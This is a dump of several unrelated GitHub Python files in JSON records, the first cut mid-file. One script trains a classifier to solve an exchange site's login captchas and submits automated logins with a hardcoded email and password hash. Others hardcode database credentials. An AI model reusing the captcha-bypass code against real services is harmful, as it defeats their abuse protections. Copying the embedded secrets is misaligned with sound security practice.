i in range(0,x1,40):\n for j in range(0,y1,40):\n position.append([i,j,i+600,j+600])\n return position\n\ndef make_data():\n classes = return_class()\n train,valid = load_picture()\n x_train = []\n y_train = []\n for i,j in enumerate(train):\n t = make_lot_pic(j)\n x_train += t\n y_train += [i for _ in range(len(t))]\n t = 0\n save_path = \"stage2/train/\"\n for img,label in zip(x_train, y_train):\n img.save(save_path+classes[label]+\"/\"+str(t)+\".jpg\")\n t += 1\n # print(img.size)\n # print(label)\n # print(classes[label])\n return x_train, y_train, valid, list(range(len(valid)))\n\ndef make_test_data():\n classes = return_class()\n train,valid = load_picture()\n\n t = 0\n save_path = \"stage2/test/\"\n for img,label in zip(valid, classes):\n img.save(save_path+label+\"/\"+str(t)+\".jpg\")\n t += 1\n\ndef make_folders():\n train_path = \"stage2/train_source/\"\n file_list = os.listdir(train_path)\n for i in file_list:\n os.mkdir(\"stage2/train/\"+i[:-4])\n os.mkdir(\"stage2/test/\"+i[:-4])\n\n\n\ndef main():\n make_folders()\n make_data()\n make_test_data()\n\n\nif __name__==\"__main__\":\n # a = make_position\n # print(a())\n main()\n","repo_name":"daikiclimate/sumaAI","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14913699916","text":"from sys import argv\nimport MeCab\nimport markovify\nimport time\n\ndef main():\n with open(\"chimi.txt\",encoding='utf-8') as file:\n text = file.read()\n tagger = MeCab.Tagger(\"-O wakati\")\n #text = tagger.parse(text)\n #model = markovify.Text(text, state_size=1)\n data = [tagger.parse(s) for s in text.split(\"\\n\") if s != \"\"]\n joinedData = \"\".join(data)\n model = markovify.NewlineText(joinedData, state_size=2)\n for i in range(100):\n sentence = model.make_short_sentence(150)\n if sentence==None:\n exit()\n sentence=sentence.replace(\" \",\"\")\n print(sentence)\n time.sleep(0.5)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"inatoihs/chimigo","sub_path":"chimi.py","file_name":"chimi.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40104783178","text":"from vnc_api import exceptions as vnc_exc\nfrom vnc_api import vnc_api\n\nfrom neutron_plugin_contrail.plugins.opencontrail.vnc_client.contrail_res_handler import (\n ResourceCreateHandler,\n ResourceDeleteHandler,\n ResourceGetHandler,\n ResourceUpdateHandler,\n)\n\n\nclass IPamMixin(object):\n def _ipam_vnc_to_neutron(self, ipam_obj):\n ipam_q_dict = self._vnc_lib.obj_to_dict(ipam_obj)\n\n # replace field names\n ipam_q_dict['id'] = ipam_q_dict.pop('uuid')\n ipam_q_dict['name'] = ipam_obj.name\n ipam_q_dict['tenant_id'] = self._project_id_vnc_to_neutron(\n ipam_obj.parent_uuid)\n ipam_q_dict['project_id'] = ipam_q_dict['tenant_id']\n ipam_q_dict['mgmt'] = ipam_q_dict.pop('network_ipam_mgmt', None)\n net_back_refs = ipam_obj.get_virtual_network_back_refs()\n if net_back_refs:\n ipam_q_dict['nets_using'] = []\n for net_back_ref in net_back_refs:\n net_fq_name = net_back_ref['to']\n ipam_q_dict['nets_using'].append(net_fq_name)\n\n return ipam_q_dict\n # end _ipam_vnc_to_neutron\n\n def _ipam_neutron_to_vnc(self, ipam_q, ipam_obj):\n if 'mgmt' in ipam_q and ipam_q['mgmt']:\n ipam_obj.set_network_ipam_mgmt(\n vnc_api.IpamType.factory(**ipam_q['mgmt']))\n\n return ipam_obj\n # end _ipam_neutron_to_vnc\n\n\nclass IPamBaseGet(ResourceGetHandler):\n resource_get_method = \"network_ipam_read\"\n\n\nclass IPamGetHandler(IPamBaseGet, IPamMixin):\n resource_list_method = \"network_ipams_list\"\n detail = False\n\n def resource_get(self, context, ipam_id, fields=None):\n try:\n ipam_obj = self._resource_get(id=ipam_id)\n except vnc_exc.NoIdError:\n # TODO() add ipam specific exception\n self._raise_contrail_exception('NetworkNotFound', net_id=ipam_id,\n resource='ipam')\n\n return self._ipam_vnc_to_neutron(ipam_obj)\n\n def resource_list_by_project(self, project_id):\n project_uuid = self._project_id_neutron_to_vnc(project_id)\n\n resp_dict = self._resource_list(parent_id=project_uuid)\n return resp_dict['network-ipams']\n\n def resource_list(self, context=None, filters=None, fields=None):\n ret_list = []\n\n # collect phase\n all_ipams = [] # all ipams in all projects\n if filters and 'tenant_id' in filters:\n project_ids = self._validate_project_ids(\n context, filters['tenant_id'])\n for p_id in project_ids:\n project_ipams = self.resource_list_by_project(p_id)\n all_ipams.append(project_ipams)\n else: # no filters\n dom_projects = self._project_list_domain(None)\n for project in dom_projects:\n proj_id = project['uuid']\n project_ipams = self.resource_list_by_project(proj_id)\n all_ipams.append(project_ipams)\n\n # prune phase\n for project_ipams in all_ipams:\n for proj_ipam in project_ipams:\n # TODO() implement same for name specified in filter\n proj_ipam_id = proj_ipam['uuid']\n if not self._filters_is_present(filters, 'id', proj_ipam_id):\n continue\n ipam_info = self.resource_get(context, proj_ipam['uuid'])\n ret_list.append(ipam_info)\n\n return ret_list\n\n def resource_count(self, filters=None):\n count = self._resource_count_optimized(filters)\n if count is not None:\n return count\n\n ipam_info = self.resource_list(filters=filters)\n return len(ipam_info)\n\n\nclass IPamUpdateHandler(ResourceUpdateHandler, IPamBaseGet, IPamMixin):\n resource_update_method = \"network_ipam_update\"\n\n def resource_update(self, context, ipam_id, ipam_q):\n try:\n ipam_obj = self._ipam_neutron_to_vnc(\n ipam_q, self._resource_get(id=ipam_id))\n except vnc_exc.NoIdError:\n raise self._raise_contrail_exception(\n 'IpamNotFound', ipam_id=ipam_id, resource='ipam')\n self._resource_update(ipam_obj)\n\n return self._ipam_vnc_to_neutron(ipam_obj)\n\n\nclass IPamDeleteHandler(ResourceDeleteHandler):\n resource_delete_method = \"network_ipam_delete\"\n\n def resource_delete(self, context, ipam_id):\n return self._resource_delete(id=ipam_id)\n\n\nclass IPamCreateHandler(ResourceCreateHandler):\n resource_create_method = \"network_ipam_create\"\n\n def resource_create(self, context, ipam_q):\n ipam_name = ipam_q.get('name', None)\n project_id = self._project_id_neutron_to_vnc(ipam_q['tenant_id'])\n try:\n project_obj = self._project_read(proj_id=project_id)\n except vnc_exc.NoIdError:\n raise self._raise_contrail_exception(\n \"ProjectNotFound\", project_id=project_id, resource='ipam')\n\n ipam_obj = self._ipam_neutron_to_vnc(\n ipam_q, vnc_api.NetworkIpam(ipam_name, project_obj))\n try:\n self._resource_create(ipam_obj)\n except vnc_exc.RefsExistError as e:\n self._raise_contrail_exception(\n 'BadRequest',\n resource='ipam', msg=str(e))\n return self._ipam_vnc_to_neutron(ipam_obj)\n\n\nclass IPamHandler(IPamCreateHandler,\n IPamUpdateHandler,\n IPamDeleteHandler,\n IPamGetHandler):\n pass\n","repo_name":"tungstenfabric/tf-neutron-plugin","sub_path":"neutron_plugin_contrail/plugins/opencontrail/vnc_client/ipam_res_handler.py","file_name":"ipam_res_handler.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74384721386","text":"import ctypes\r\nfrom ctypes import windll, wintypes\r\n\r\n\r\nINTERNET_PER_CONN_FLAGS = 1\r\nINTERNET_PER_CONN_AUTOCONFIG_URL = 4\r\nINTERNET_OPTION_REFRESH = 37\r\nINTERNET_OPTION_SETTINGS_CHANGED = 39\r\nINTERNET_OPTION_PER_CONNECTION_OPTION = 75\r\n\r\nPROXY_TYPE_AUTO_PROXY_URL = 4\r\n\r\nInternetSetOption = windll.wininet.InternetSetOptionW\r\nInternetQueryOption = windll.wininet.InternetQueryOptionW\r\nGlobalFree = windll.Kernel32.GlobalFree\r\n\r\n\r\nclass INTERNET_PER_CONN_OPTION(ctypes.Structure):\r\n class Value(ctypes.Union):\r\n _fields_ = [\r\n ('dwValue', wintypes.DWORD),\r\n ('pszValue', wintypes.LPWSTR),\r\n ('ftValue', wintypes.FILETIME),\r\n ]\r\n\r\n def set(self, val):\r\n if type(val) == wintypes.DWORD:\r\n self.dwValue = val\r\n elif type(val) == wintypes.LPWSTR:\r\n self.pszValue = val\r\n else:\r\n self.dwValue = 0\r\n\r\n _fields_ = [\r\n ('dwOption', wintypes.DWORD),\r\n ('Value', Value),\r\n ]\r\n\r\n\r\nclass INTERNET_PER_CONN_OPTION_LIST(ctypes.Structure):\r\n _fields_ = [\r\n ('dwSize', wintypes.DWORD),\r\n ('pszConnection', wintypes.LPWSTR),\r\n ('dwOptionCount', wintypes.DWORD),\r\n ('dwOptionError', wintypes.DWORD),\r\n ('pOptions', ctypes.POINTER(INTERNET_PER_CONN_OPTION)),\r\n ]\r\n\r\n @staticmethod\r\n def make(opt_items):\r\n item_num = len(opt_items)\r\n List = INTERNET_PER_CONN_OPTION_LIST()\r\n Option = (INTERNET_PER_CONN_OPTION * item_num)()\r\n nSize = wintypes.DWORD(ctypes.sizeof(INTERNET_PER_CONN_OPTION_LIST))\r\n\r\n index = 0\r\n for k, v in opt_items:\r\n Option[index].dwOption = k\r\n Option[index].Value.set(v)\r\n index += 1\r\n\r\n List.dwSize = ctypes.sizeof(INTERNET_PER_CONN_OPTION_LIST)\r\n List.pszConnection = None\r\n List.dwOptionCount = item_num\r\n List.dwOptionError = 0\r\n List.pOptions = Option\r\n return List, nSize\r\n\r\n\r\ndef get_pac_setting_impl():\r\n opt_list, size_ = INTERNET_PER_CONN_OPTION_LIST.make([\r\n (INTERNET_PER_CONN_AUTOCONFIG_URL, None),\r\n (INTERNET_PER_CONN_FLAGS, None)\r\n ])\r\n\r\n is_ok = InternetQueryOption(None, INTERNET_OPTION_PER_CONNECTION_OPTION,\r\n ctypes.byref(opt_list), ctypes.byref(size_))\r\n opt = opt_list.pOptions\r\n v0 = opt[0].Value\r\n\r\n if v0.dwValue:\r\n url = ctypes.wstring_at(v0.pszValue)\r\n GlobalFree(v0.dwValue)\r\n else:\r\n url = ''\r\n\r\n flags = opt[1].Value.dwValue\r\n return bool(is_ok), url, flags\r\n\r\n\r\ndef set_pac_setting_impl(url, flags=None):\r\n if url is None and flags is None:\r\n return False\r\n\r\n settings = []\r\n if url is not None:\r\n url_buf = ctypes.create_unicode_buffer(url)\r\n url_ = ctypes.cast(url_buf, wintypes.LPWSTR)\r\n url_item = (INTERNET_PER_CONN_AUTOCONFIG_URL, url_)\r\n settings.append(url_item)\r\n\r\n if flags is not None:\r\n flag_item = (INTERNET_PER_CONN_FLAGS, wintypes.DWORD(flags))\r\n settings.append(flag_item)\r\n\r\n opt_list, size_ = INTERNET_PER_CONN_OPTION_LIST.make(settings)\r\n is_ok = InternetSetOption(None, INTERNET_OPTION_PER_CONNECTION_OPTION,\r\n ctypes.byref(opt_list), size_)\r\n if not is_ok:\r\n return False\r\n\r\n InternetSetOption(None, INTERNET_OPTION_SETTINGS_CHANGED, None, 0)\r\n InternetSetOption(None, INTERNET_OPTION_REFRESH, None, 0)\r\n return True\r\n\r\n\r\ndef get_pac_setting():\r\n is_ok, url, flags = get_pac_setting_impl()\r\n if not is_ok:\r\n return False, None, None\r\n\r\n is_enabled = flags & PROXY_TYPE_AUTO_PROXY_URL\r\n return is_ok, url, bool(is_enabled)\r\n\r\n\r\ndef set_pac_setting(pac_file=None, enabled=None):\r\n if pac_file is None and enabled is None:\r\n return False\r\n\r\n if enabled is None:\r\n return set_pac_setting_impl(pac_file)\r\n\r\n is_ok, url, flags = get_pac_setting_impl()\r\n if not is_ok:\r\n return False\r\n\r\n if enabled:\r\n flags |= PROXY_TYPE_AUTO_PROXY_URL\r\n else:\r\n flags &= ~PROXY_TYPE_AUTO_PROXY_URL\r\n\r\n return set_pac_setting_impl(pac_file, flags)\r\n\r\n\r\ndef test():\r\n def show_setting():\r\n is_ok, url, enabled = get_pac_setting()\r\n assert is_ok\r\n print(url, enabled)\r\n return enabled\r\n\r\n show_setting()\r\n\r\n from time import time\r\n set_pac_setting(pac_file=f'http://proxy.pac/?t={time()}')\r\n enabled = show_setting()\r\n\r\n set_pac_setting(pac_file=None, enabled=not enabled)\r\n show_setting()\r\n\r\n\r\nif __name__ == '__main__':\r\n test()\r\n","repo_name":"1ocalhost/creeper","sub_path":"src/creeper/impl/win_pac_setting.py","file_name":"win_pac_setting.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7807031958","text":"import argparse\r\nimport json\r\nfrom random import randint\r\nimport re\r\nfrom pprint import pprint\r\nfrom functools import reduce\r\n\r\ndef parse_command_line():\r\n \"\"\"\r\n Set up command line arguments.\r\n Args:\r\n None.\r\n Returns:\r\n Argparse object for setting up command line arguments.\r\n \"\"\"\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-i', '--input', dest=\"input_file\", help=\"path to json output of data_usa_parse.py\", metavar=\"PATH\", required=True)\r\n parser.add_argument('-o', '--output', dest=\"output_file\", help=\"output file, or stdout if omitted\", metavar=\"FILE\", required=False)\r\n parser.add_argument('-s', '--story-type', dest=\"story_type\", help=\"story type to create, 0-66 inclusive\", metavar=\"STORY\", required=False)\r\n parser.add_argument('-m', '--mayor', dest=\"mayor\", help=\"Mayor's name.\", metavar=\"NAME\", required=False)\r\n parser.add_argument('-c', '--city', dest=\"city\", help=\"city's name\", metavar=\"CITY\", required=False)\r\n parser.add_argument('-t', '--team', dest=\"team\", help=\"name of a sports team\", metavar=\"TEAM\", required=False)\r\n args = parser.parse_args()\r\n return args\r\n\r\n\r\n\r\ndef generate_story(raw_tokens, story_type, mayor, city, team, fed_rate):\r\n if 0 > story_type > 66:\r\n raise AssertionError(\"Story type must be between 0 and 82 inclusive.\")\r\n idx = list(raw_tokens.keys())[story_type]\r\n story_group = raw_tokens[idx]\r\n base_story = story_group[randint(0, len(story_group) - 1)]\r\n raw_tokens[\"mayorname\"] = mayor\r\n raw_tokens[\"cityname\"] = city\r\n raw_tokens[\"teamname\"] = team\r\n\r\n try:\r\n headline_text, body = base_story.split('+', 1)\r\n except ValueError as e:\r\n print(\"+?\", \"+\" in base_story, \"len\", len(base_story.split('+')), \"cnt\", base_story.count('+'))\r\n print(base_story)\r\n raise ValueError(e)\r\n # if \"dateline\" in base_story:\r\n\r\n\r\n filled_headline = tokens_fill(headline_text, raw_tokens, headline=True)\r\n filled_story = tokens_fill(body, raw_tokens, {}, headline=False)\r\n # print(\"filled:\", [filled_story])\r\n\r\n final_body = format_story(filled_story, fed_rate)\r\n final_headline = format_headline(filled_headline, fed_rate)\r\n\r\n final_story = final_headline + final_body\r\n return final_story\r\n\r\ndef format_headline(headline, fed_rate):\r\n headline = headline.title() + ' -'\r\n headline = number_replace(headline, fed_rate)\r\n return headline\r\n\r\ndef format_story(story, fed_rate):\r\n # Because re.sub() escapes the single quotes.\r\n no_escape = story.replace(\"\\\\'\", \"'\")\r\n\r\n # find dashes that are between two words. We don't want to change those to paragraph breaks.\r\n if \"MisSim\" not in story:\r\n no_escape = no_escape.replace(\"--\", \"zqzdbldashzqz\")\r\n else:\r\n no_escape = no_escape.replace(\"--\", \"\\n\\t\\n\\t\")\r\n inline_dashes = [x.start() + 1 for x in re.finditer(r\"\\w(? None:\n self.queue = queue\n\n def consume(self, recognition_result: RecognitionResult) -> None:\n self.queue.put(recognition_result)\n\nclass RecognitionPipeline(FrameConsumer):\n def __init__(\n self,\n jobdatabase: PrintjobRepository,\n result_consumer: Union[RecognitionResultConsumer, queue.Queue],\n feature_extractor: FeatureExtractor,\n preprocessing: ImagePreprocessing,\n ) -> None:\n self.jobdatabase = jobdatabase\n self.feature_extractor = feature_extractor\n self.preprocessing = preprocessing\n\n\n if isinstance(result_consumer, queue.Queue):\n self.resultConsumer = QueueRecognitionResultConsumer(result_consumer)\n else:\n self.resultConsumer = result_consumer\n\n def consume(self, frame: np.ndarray, capturing_context: CapturingContext):\n\n preprocessed_frame = self.preprocessing.preprocess(frame)\n\n features = self.feature_extractor.extract_features(preprocessed_frame)\n\n all_jobs_features = self.jobdatabase.get_all_printjob_features()\n\n job_id, distance = similarity.find_best_match(features, all_jobs_features)\n\n job = self.jobdatabase.get(job_id)\n\n recognition_result = RecognitionResult(\n job=job,\n captured_image=frame,\n capturing_context=capturing_context,\n preprocessed_image=preprocessed_frame,\n calculated_distance=distance,\n )\n self.resultConsumer.consume(recognition_result)\n","repo_name":"maria0406/Vision.Link","sub_path":"VisionLink-main/ors/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26088513896","text":"# Assignment Basketball Dictionaries\n\n\"\"\"\nChallenge 1: Update the Constrictor\nUpdate the constrictor to accept a dictionary with a single player's \ninfo instead of individual arguments for attribuites\n\"\"\"\n\nclass Player:\n \"\"\"Create a model of a player\"\"\"\n\n def __init__(self, player):\n self.name = player['name']\n self.age = player['age']\n self.position = player['position']\n self.team = player['team']\n\n def __repr__(self):\n \"\"\"__repr__ is used to format class print to terminal\"\"\"\n display = f\"player: {self.name}, age: {self.age}, position: {self.position}, team: {self.team}\" \n return display\n\n \"\"\"\n Creat a classmethod for taking a list of dictonaries and creating\n a list of instances\n \"\"\"\n @classmethod\n def add_player(cls, players_lst):\n \"\"\"Add player to all_players list for class\"\"\"\n all_players = []\n for player in players_lst:\n all_players.append(cls(player))\n return all_players\n\nthomas = {\n 'name': 'Thomas Muller', \n 'age': 32, \n 'position': 'Attacking midfielder', \n 'team': 'Bayern Munchen'\n}\n\njonas = {\n 'name': 'Jonas Hofmann',\n 'age': 29,\n 'position': 'Attacking midfielder',\n 'team': 'Borussia M\\'Gladbach'\n}\n\nlukas = {\n 'name': 'Lukas Klostermann',\n 'age': 26,\n 'position': 'Center back',\n 'team': 'RB Leipzig'\n}\n\ntimo = {\n 'name': 'Timo Werner',\n 'age': 26,\n 'position': 'Striker',\n 'team': 'Chelsea'\n}\n\n\"\"\"\nChallenge 2: Create instances using individual player dictionaries\nNOTE: I had all ready created data before realizing I was suppose to \nuse the provided data. I just left it because it is the same basic\nthing... hopefully that is ok.\n\"\"\"\n\nplayer_thomas = Player(thomas)\nprint(player_thomas)\n\nplayer_jonas = Player(jonas)\nprint(player_jonas)\n\nplayer_lukas = Player(lukas)\nprint(player_lukas)\n\nplayer_timo = Player(timo)\nprint(player_timo)\nprint()\n\n\"\"\"\nChallenge 3: Make a list of Player instances for a list of dictionaries\nPopulate a new list with Player instances from the list of players\n\"\"\"\n\nplayers_lst = [\n {\n \"name\": \"Kevin Durant\", \n \"age\":34, \n \"position\": \"small forward\", \n \"team\": \"Brooklyn Nets\"\n },\n {\n \"name\": \"Jason Tatum\", \n \"age\":24, \n \"position\": \"small forward\", \n \"team\": \"Boston Celtics\"\n },\n {\n \"name\": \"Kyrie Irving\", \n \"age\":32, \n \"position\": \"Point Guard\", \n \"team\": \"Brooklyn Nets\"\n },\n {\n \"name\": \"Damian Lillard\", \n \"age\":33, \n \"position\": \"Point Guard\", \n \"team\": \"Portland Trailblazers\"\n },\n {\n \"name\": \"Joel Embiid\", \n \"age\":32, \n \"position\": \"Power Foward\", \n \"team\": \"Philidelphia 76ers\"\n },\n {\n \"name\": \"\", \n \"age\":16, \n \"position\": \"P\", \n \"team\": \"en\"\n }\n]\n\n\"\"\"\nSolution for challenge 3\nTake a list of dictionaries and produce a new list of instances\n\"\"\"\n\nnew_list = []\n\nfor item in range(len(players_lst)):\n temp_name = f\"player_{players_lst[item]['name']}\"\n temp_name = temp_name.lower()\n temp_name = temp_name.replace(' ', '_')\n\n temp_name = Player(players_lst[item])\n new_list.append(temp_name)\n # print(temp_name.name)\n\n# Print out instances in new_list\nfor item in new_list:\n print(item)\nprint()\n# NINJA BONUS: add a get_team(cls, team_list) and @classmethod\nall_players = Player.add_player(players_lst)\n\nfor player in all_players:\n print(player)\n\n","repo_name":"dreessen-n/coding-dojo_python","sub_path":"fundamentals/oop/basketball_dictionaries.py","file_name":"basketball_dictionaries.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16523081096","text":"#Enxhi Merkaj 20/10/2023\n#Team Assignment\n\n#This program will prompt the user to choose between 9 options until the user chooses option 0.\n\n#Create a lists of 10 different options\nlists = [\n {\"value\": 1, \"description\": \"Watch a movie!\"},\n {\"value\": 2, \"description\": \"Go to sleep.\"},\n {\"value\": 3, \"description\": \"You should study.\"},\n {\"value\": 4, \"description\": \"Go learn Python.\"},\n {\"value\": 5, \"description\": \"Go out!\"},\n {\"value\": 6, \"description\": \"Maybe cook something.\"},\n {\"value\": 7, \"description\": \"Choose another number.\"},\n {\"value\": 8, \"description\": \"Call your friend.\"},\n {\"value\": 9, \"description\": \"Learn Java\"},\n {\"value\": 0, \"description\": \"Exit the program\"},\n]\n\n#Create a loop that will run until the user chooses 0\nwhile True:\n\n # Get user input\n user_input = input(\"Select a choice from 1 - 9: \")\n#Conver the input to integer\n try:\n choice = int(user_input)\n\n#Execute if-else statement\n if choice in [option['value'] for option in lists]:\n if choice == 0:\n print(\"Exiting the program.\")\n break\n else:\n print(f\"You selected {choice}: {lists[choice-1]['description']}\")\n else:\n print(\"Invalid choice. Please select a valid option.\")\n except ValueError:\n print(\"Invalid input. Please enter a number.\")\n\n# End of the program\n","repo_name":"Angiemerkaj/TeamAssignment","sub_path":"teamassignment.py","file_name":"teamassignment.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"820338001","text":"import base64\nimport os\nimport time\nfrom io import BytesIO\n\nimport requests\nfrom PIL import Image, ImageDraw\nimport numpy as np\nfrom sklearn import neighbors, preprocessing\nfrom sklearn.model_selection import train_test_split, cross_val_score\n\nfrom scikit.图片识别测试 import createData1\nfrom scikit.生成图片 import iamge2imbw\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\n\n\n# 获取图片\ndef getimg(url='http://www.nb.top/12lian/user/getimg'):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'}\n r = requests.post(url, headers=headers)\n\n return r.json();\n\n\ndef train():\n X, y = createData1()\n scaler = preprocessing.StandardScaler().fit(X)\n scaler.transform(X)\n knn = neighbors.KNeighborsClassifier()\n\n knn.fit(X, y)\n return knn, scaler\n\n\ndef score(n_neighbors=3):\n X, y = createData1()\n preprocessing.scale(X)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n knn = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors)\n knn.fit(X_train, y_train)\n print(knn.score(X_test, y_test))\n\n\ndef login(url, codid, vercode):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'}\n email = '982973525@qq.com'\n pwd = 'aa64c947ce278ddc0b4418bd186fb1a0'\n data = {'email': email,\n 'pwd': pwd,\n 'codeid': codid,\n 'vercode': vercode,\n 'source': 1\n }\n\n r = requests.post(url, data=data, headers=headers)\n return r.json()\n\n\n# 将图片分成五份\ndef spitAndSave(knn=None, scaler=None):\n json = getimg()\n IMGCode = json['attachment']['IMGCode']\n codeUUID = json['attachment']['codeUUID']\n imgdata = base64.b64decode(IMGCode)\n image_data = BytesIO(imgdata)\n im = Image.open(image_data)\n # im.save('../data/verify_code/' + codeUUID + \".jpg\")\n\n py = [];\n for j in range(5):\n box = (20 * j, 00, (1 + j) * 20, 30)\n dm = im.crop(box)\n dm = dm.convert(\"L\")\n dm, rate = iamge2imbw(dm)\n dm.save('../data/chaoex/ ' + str(j) + '_' + codeUUID + \".jpg\");\n\n if knn != None:\n data = [dm.getdata()];\n scaler.transform(data)\n p = knn.predict(data);\n print(p[0])\n dm.save('../data/prdict/' + p[0] + '_' + codeUUID + \".jpg\");\n\n\n# 将图片分成五份\ndef spit2():\n json = getimg()\n IMGCode = json['attachment']['IMGCode']\n codeUUID = json['attachment']['codeUUID']\n imgdata = base64.b64decode(IMGCode)\n image_data = BytesIO(imgdata)\n im = Image.open(image_data)\n\n dms = [];\n data = []\n for j in range(5):\n box = (20 * j, 00, (1 + j) * 20, 30)\n dm = im.crop(box)\n dm = dm.convert(\"L\")\n dm, rate = iamge2imbw(dm)\n dms.append(dm)\n data.append(dm.getdata())\n return data, dms, codeUUID;\n\n\ndef create():\n for i in range(10):\n r = getimg();\n t = str(int(time.time() * 1000))\n\n IMGCode = r['attachment']['IMGCode']\n codeUUID = r['attachment']['codeUUID']\n imgdata = base64.b64decode(IMGCode)\n # filename = os.popen('redis-cli -h 192.168.0.138 get IMG' + codeUUID).read().strip() + '_' + t + '.jpg'\n filename = codeUUID + '.jpg';\n print(filename)\n file = open('../data/verify_code/' + filename, 'wb')\n file.write(imgdata)\n file.close()\n\n\ndef train_real():\n knn, scaler = train();\n test_x, dms, codeUUID = spit2()\n scaler.transform(test_x)\n vercode = ''.join(knn.predict(test_x))\n print(vercode)\n\n r = login('http://www.nb.top/12lian/user/login', codeUUID, vercode)\n print(r)\n if r['status'] != 200:\n for i in range(5):\n dms[i].save('../data/prdict/' + vercode[i] + '_' + codeUUID + str(i) + \".jpg\");\n else:\n for i in range(5):\n dms[i].save('../data/single_code/' + vercode[i] + '_' + codeUUID + str(i) + \".jpg\");\n\n\ndef pp():\n k_scores = []\n\n x, y = createData1()\n for k in range(1, 30):\n knn = neighbors.KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(knn, x, y, cv=10, scoring='accuracy') # for classification\n k_scores.append(scores.mean())\n plt.plot(range(1, 30), k_scores)\n plt.xlabel('Value of K for KNN')\n plt.ylabel('Cross-Validated Accuracy')\n plt.show()\n\n\nif __name__ == '__main__':\n score()\n","repo_name":"bigcong/tinker","sub_path":"scikit/CHAOEX测试.py","file_name":"CHAOEX测试.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73932414186","text":"from tkinter import *\nfrom tkinter.ttk import Notebook\nimport mysql.connector\n\nimport species, animals, enclosures, complexes\n\n# Create a connection to the database\nmydb = mysql.connector.connect(\n host = \"localhost\",\n user = \"root\",\n password = \"password\",\n database = \"zoodatabase\"\n)\n\nmycursor = mydb.cursor()\n\ndef signout_clicked():\n zookeeperPage.destroy()\n mainFrame.place(relwidth=1,relheight=1)\n\ndef handle_zookeeper_page(window,eid,mFrame):\n global mainFrame\n mainFrame = mFrame\n\n global zookeeperPage\n zookeeperPage = Frame(window)\n\n zookeeperPage.rowconfigure(0,weight=1)\n zookeeperPage.rowconfigure(1,weight=1)\n zookeeperPage.columnconfigure(0,weight=1)\n\n zookeeperPage.place(relwidth=1,relheight=1)\n\n signoutButton = Button(zookeeperPage, text=\"Sign Out\", command=signout_clicked)\n signoutButton.grid(row=0,column=0,columnspan=2,sticky=N+W,padx=5)\n\n zookeeperNotebook = Notebook(zookeeperPage)\n zookeeperNotebook.grid(row=1,column=0)\n\n #Create frames\n homeFrame = Frame(zookeeperNotebook, width=1000, height=700)\n speciesFrame = Frame(zookeeperNotebook, width=1000, height=700)\n animalsFrame = Frame(zookeeperNotebook, width=1000, height=700)\n enclosuresFrame = Frame(zookeeperNotebook, width=1000, height=700)\n complexesFrame = Frame(zookeeperNotebook, width=1000, height=700)\n\n homeFrame.pack(fill='both', expand=True)\n speciesFrame.pack(fill='both', expand=True)\n animalsFrame.pack(fill='both', expand=True)\n enclosuresFrame.pack(fill='both', expand=True)\n complexesFrame.pack(fill='both', expand=True)\n\n zookeeperNotebook.add(homeFrame, text='Home')\n zookeeperNotebook.add(speciesFrame, text='Species')\n zookeeperNotebook.add(animalsFrame, text='Animals')\n zookeeperNotebook.add(enclosuresFrame, text='Enclosures')\n zookeeperNotebook.add(complexesFrame, text='Indoor Complexes')\n \n set_home_frame(homeFrame,eid)\n species.setSpeciesFrame(speciesFrame, True)\n animals.set_animals_frame(animalsFrame)\n enclosures.set_enclosures_frame(enclosuresFrame, False)\n complexes.set_complexes_frame(complexesFrame, False)\n\ndef set_home_frame(hFrame,eid):\n global homePage\n homePage = hFrame\n\n homePage.rowconfigure(0,weight=1)\n homePage.rowconfigure(1,weight=1)\n homePage.rowconfigure(2,weight=1)\n homePage.rowconfigure(3,weight=1)\n homePage.rowconfigure(4,weight=1)\n\n mycursor.execute(\"SELECT Name FROM Employee WHERE EmployeeID = %s\"%eid)\n result = mycursor.fetchall()\n nameMessage = Label(homePage,text=\"Welcome %s\"%result[0])\n nameMessage.grid(row=0,column=0,sticky=N+S+W+E,padx=5,pady=10)\n\n mycursor.execute(\"SELECT Email FROM Employee WHERE EmployeeID = %s\"%eid)\n result = mycursor.fetchall()\n emailMessage = Label(homePage,text=\"Email: %s\"%result[0])\n emailMessage.grid(row=1,column=0,sticky=N+S+W+E,padx=5,pady=10)\n\n mycursor.execute(\"SELECT Phone_number FROM Employee WHERE EmployeeID = %s\"%eid)\n result = mycursor.fetchall()\n phoneMessage = Label(homePage,text=\"Phone: %s\"%result[0])\n phoneMessage.grid(row=2,column=0,sticky=N+S+W+E,padx=5,pady=10)\n\n mycursor.execute(\"SELECT Address FROM Employee WHERE EmployeeID = %s\"%eid)\n result = mycursor.fetchall()\n addressMessage = Label(homePage,text=\"Address: %s\"%result[0])\n addressMessage.grid(row=3,column=0,sticky=N+S+W+E,padx=5,pady=10)\n\n 